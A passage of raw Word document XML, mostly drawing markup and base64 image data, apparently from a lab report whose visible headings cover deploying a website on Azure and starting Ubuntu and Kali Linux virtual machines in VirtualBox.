8AQAAW7wAAAAA&#10;">
                <v:rect id="Rectangle 2459" o:spid="_x0000_s1134" style="position:absolute;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BxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heQVvuqlY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Scf9AcYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="37EC8EAB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2460" o:spid="_x0000_s1135" style="position:absolute;top:2026;width:713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4hwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Na8JA&#10;EL0X/A/LCN7qxi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FpGeIcMAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2E87D878"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1 :</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2461" o:spid="_x0000_s1136" style="position:absolute;left:5348;top:2026;width:56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14:paraId="0448EA6A" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2462" o:spid="_x0000_s1137" style="position:absolute;left:5775;top:2026;width:2510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79C8BAD2" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Deploying website on Azure</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2463" o:spid="_x0000_s1138" style="position:absolute;left:24661;top:2026;width:56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28D862F9" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 2464" o:spid="_x0000_s1139" style="position:absolute;left:59448;top:35942;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5B03B4DD" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 2472" o:spid="_x0000_s1140" type="#_x0000_t75" style="position:absolute;left:383;top:3897;width:58737;height:3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vLwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/dasJA&#10;FITvC32H5Qi9MxuDqKSuIS2IvRE0+gCH7MkPzZ4N2W0S375bEHo5zMw3zD6bTSdGGlxrWcEqikEQ&#10;l1a3XCu4347LHQjnkTV2lknBgxxkh9eXPabaTnylsfC1CBB2KSpovO9TKV3ZkEEX2Z44eJUdDPog&#10;h1rqAacAN51M4ngjDbYcFhrs6bOh8rv4MQoumxObdf5xLkecyD0qaWYrlXpbzPk7CE+z/w8/219a&#10;QbLeJvD3JjwBefgFAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAUwYry8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;">
                  <v:imagedata r:id="rId44" o:title=""/>
                </v:shape>
                <v:shape id="Shape 2473" o:spid="_x0000_s1141" style="position:absolute;left:256;top:3770;width:58991;height:33109;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5899150,331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CGxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeEJvmq0VW7ZGEaFWKCi19dDbY/OapG5etptUt//eCEKPw8x8w0znna/FkdroAiu4GxYg&#10;iKugHRsFH+/Pg0cQMSFrrAOTgj+KMJ/1bqZY6nDiNzrukhEZwrFEBTalppQyVpY8xmFoiLP3FVqP&#10;KcvWSN3iKcN9LUdFMZEeHecFiw0tLVWH3a9XgI3bb1+c+bGrxevnN+3JrORGqdt+t3gCkahL/+Fr&#10;e60VjMYP93B5k5+AnJ0BAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAXpfQhsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,3310890r5899150,l5899150,,,,,3310890xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3310890"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="500649E8" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4E2645" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="13" w:line="249" w:lineRule="auto"/>
        <w:ind w:left="-5" w:hanging="10"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Starting Ubuntu VM and KALI LINUX VM on Virtual Box </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1EE880" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="40" w:right="-184"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E4967F" wp14:editId="796E6FC8">
                <wp:extent cx="5960974" cy="3386553"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="42309" name="Group 42309"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5960974" cy="3386553"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5960974" cy="3386553"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2470" name="Rectangle 2470"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3237353"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="4C77DCC0"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475" name="Picture 2475"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId45"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="2476" name="Shape 2476"/>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E4967F" id="Group 42309" o:spid="_x0000_s1142" style="width:469.35pt;height:266.65pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59609,33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K1d61AMAAB0KAAAOAAAAZHJzL2Uyb0RvYy54bWy8Vm2P2zYM/j5g&#10;/8HQ917ivNu4pBh666HAsB7a7gcoshwblSVBUt7260dSspN76W64AQ0Qm5ZI6uEjktLt+1OnsoN0&#10;vjV6zfKbMcukFqZq9W7N/vr28d2KZT5wXXFltFyzs/Ts/ebXX26PtpQT0xhVSZeBE+3Lo12zJgRb&#10;jkZeNLLj/sZYqWGyNq7jAT7dblQ5fgTvnRpNxuPF6GhcZZ0R0nsYvYuTbEP+61qK8LmuvQyZWjPA&#10;Fujp6LnF52hzy8ud47ZpRYLB34Ci462GRQdXdzzwbO/aZ666VjjjTR1uhOlGpq5bISkGiCYfP4nm&#10;3pm9pVh25XFnB5qA2ic8vdmt+PNw7+xX++CAiaPdARf0hbGcatfhG1BmJ6LsPFAmTyETMDgvFuNi&#10;OWOZgLnpdLWYz6eRVNEA88/sRPP7K5ajfuHRIzhHCwniLxz4/8fB14ZbSdT6Ejh4cFlbrdlktoQk&#10;0byDTP0CucP1TsmMRoke0h3I8qUH3l5gal7kxSRfsAw5mUyX056TgTVgCQoDOcuL1Wy6QMqGwHlp&#10;nQ/30nQZCmvmAAplFz/84UNU7VVweaXxqc3HVqk4iyPAX48QpXDanijIGa2GQ1tTnSHyxri/P0MN&#10;18oc18wkiWFZw+I4yzL1SQPjWEG94Hph2wsuqA+G6izC+W0fTN0S3stqCRds5ebWtqKEf8prkJ7t&#10;6ev1D1Zh7yRLTrr/5KPj7vvevoMStDy021a14UztBFhGUPrw0ArcWvx4lB7zPj1AAdfF5Jjj7vWa&#10;aId7gN+P3GxVa3GDkBuUE2DoRU9q+YWYY5+4M2LfSR1i43NSAXajfdNazzJXym4rIYfdpyqPFeiD&#10;k0E0uGANC2NCx+wYJgjlBRhi/kFK55PlGHYfE5YkcMTLIZ1Xy+lyDtOxCYynxZg4eWtGE6wIhETA&#10;hc3p5zQAKNvYAKhF4P4O9QKZ8HrxR5bSyXJhqCjyC0OTYvqMIbGPNY/E9nUO50kVKx7Gml4SJ92L&#10;2Bn+9WiD/EY7dIpiBgU+XyUsDXbsCAXnO6j8b4Y0w6Vv9xoxcy46Sl/rDj7pFLgOr9fr35Z8X+sT&#10;VZAqvUb/jppXdF7pCGW8jJAwLGqeQ6igd02m0hj1ZD7DBBYcLhk1VA71UzhfdRXdvNAxfTgriXwo&#10;/UXW0DvhvMvJzrvd9oNy2YFju6Nf6uCkijax4pLV+IdWqMqVbXjyldykBSiu5Ak1Jd1oBjDJrUho&#10;4rUGLgcQZ3+5AS4GI4JldBjsNVzJaEGsrRTtpVMjL6noSKI7CCFK9yW85Fx/k9blVrf5BwAA//8D&#10;AFBLAwQKAAAAAAAAACEAzFy7evcEAQD3BAEAFAAAAGRycy9tZWRpYS9pbWFnZTEuanBn/9j/4AAQ&#10;SkZJRgABAQEAYABgAAD/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQ&#10;DQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT/wAARCAIeA8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z4gi1q10u2n8N&#10;+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